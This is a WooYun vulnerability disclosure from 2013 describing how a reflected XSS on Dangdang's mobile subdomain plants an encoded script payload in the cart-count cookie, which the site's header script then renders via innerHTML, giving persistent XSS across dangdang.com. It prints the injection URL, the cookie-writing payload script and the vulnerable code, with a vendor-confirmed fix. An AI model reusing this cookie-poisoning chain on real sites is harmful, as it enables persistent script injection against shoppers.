当当网：二级域反射XSS变身所有域下存储XSS

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-017527

漏洞标题：当当网：二级域反射XSS变身所有域下存储XSS

漏洞作者：八折

提交时间：2013-01-19 12:54

修复时间：2013-03-05 12:54

公开时间：2013-03-05 12:54

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-01-19：细节已通知厂商并且等待厂商处理中
2013-01-19：厂商已经确认，细节仅向厂商公开
2013-01-29：细节向核心白帽子及相关领域专家公开
2013-02-08：细节向普通白帽子公开
2013-02-18：细节向实习白帽子公开
2013-03-05：细节向公众公开

简要描述：

1.二级甚至三级域下的反射XSS是不是很鸡肋?
2.只能XX自己的XSS是不是更鸡肋?(如更改user-agent可弹框这种,你懂的)
1+2=所有域下存储XSS.
只是为了好玩～～

详细说明：

1.登录当当后，页面顶部的用户昵称、购物车数量等是js从COOKIE中读出来加载的，伪造COOKIE即可形成存储型XSS(几乎所有域下，即使用户不登录或退出，都不影响COOKIE里购物车数量，本例XSS有效至2020年，看官按口味可自行调整).

2.找到手机当当下一处反射XSS，加载更改COOKIE中购物车数量的js代码。
http://m.dangdang.com/touch/leavemsg.php?sid=3d41%22%3E%3Cscript%20src=http://localhost/test/dd.js%3E%3C/script%3E%3C%22
dd.js代码：

document.cookie = "cart_items_count=%u003c%u0069%u006d%u0067%u0020%u0073%u0072%u0063%u003d%u0031%u0020%u006f%u006e%u0065%u0072%u0072%u006f%u0072%u003d%u0061%u006c%u0065%u0072%u0074%u0028%u0031%u0029%u003e;Domain=dangdang.com;Path=/;expires="+new Date().toGMTString().replace('2013','2020');
location.href="http://www.dangdang.com";

当当解析COOKIE的js部分：
http://www.dangdang.com/Found/pagetop_2012.js

if(usernick==""){
        xinshou = "<a name=\"dl\" href=\"java"+"scr"+"ipt:PageTopLogIn();\" target=\"_self\" class=\"login_link\">登录</a><a name=\"zc\" href=\"java"+"scr"+"ipt:PageTopRegist();\" target=\"_self\" class=\"login_link\">免费注册</a>";
    }else{
        chakanlk = " [<a name=\"tc\" href=\"java"+"scr"+"ipt:PageTopSignOut();\" target=\"_self\">退出登录</a>]";
        xinshou = "";
        var cartItemsCount=getCookie_one("cart_items_count","");
        if(cartItemsCount!=null&&cartItemsCount.length>0&&cartItemsCount!="undefined")
        {
            var cic=document.getElementById("cart_items_count");
            if(cic!=''){
                cic.innerHTML="("+cartItemsCount+")";  //这位置，读出COOKIE里的值直接输出在了页面上，造成XSS
            }
        }
    }

漏洞证明：

视频带感～～

密码: ddxss

修复方案：

cic.innerHTML="("+cartItemsCount+")"; 及其它相关位置再次过滤，或不从COOKIE里读取

版权声明：转载请注明来源八折@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2013-01-19 13:42

厂商回复：

非常感谢。我们会尽快修补。多谢八折洞主，希望有机会到当当购物，争取给你打个“八折”。：）

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-017527

漏洞标题：当当网：二级域反射XSS变身所有域下存储XSS

相关厂商：当当网

漏洞作者：八折

提交时间：2013-01-19 12:54

修复时间：2013-03-05 12:54

公开时间：2013-03-05 12:54

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源八折@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-017527

漏洞标题：当当网：二级域反射XSS变身所有域下存储XSS

相关厂商：当当网

漏洞作者： 八折

提交时间：2013-01-19 12:54

修复时间：2013-03-05 12:54

公开时间：2013-03-05 12:54

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-017527"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 八折@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：八折

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源八折@乌云